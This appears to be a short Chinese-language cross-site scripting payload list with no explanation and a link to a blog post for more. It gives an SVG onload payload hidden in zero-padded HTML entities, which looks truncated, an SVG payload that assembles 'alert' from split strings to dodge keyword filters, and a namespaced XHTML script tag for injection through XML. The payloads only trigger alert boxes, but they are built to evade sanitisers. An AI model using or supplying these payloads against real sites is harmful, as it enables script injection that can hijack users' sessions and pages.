• <svg onload=&#x00000000061;&#x0000000006c&#x0000000065&#x0000000072&#x00000000074(&#x0000000000064;&#x000000000006f;&#x0000000000063;&#x0000000000075;&#x000000000006d;&#x0000000000065;&#x000000000006e;&#x0000000000074;&#x000000000002e;&#x0000000000064;&#x000000000006f;&#x000000000006d;&#x0000000000061;&#x0000000000069;&#x000000000006e;&#0000000000000041;
• <svg/onload=a=self['aler'+'t'];a(document.domain)>

XML中的XSS：

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

更多：
https://www.cnblogs.com/xyongsec/p/11274852.html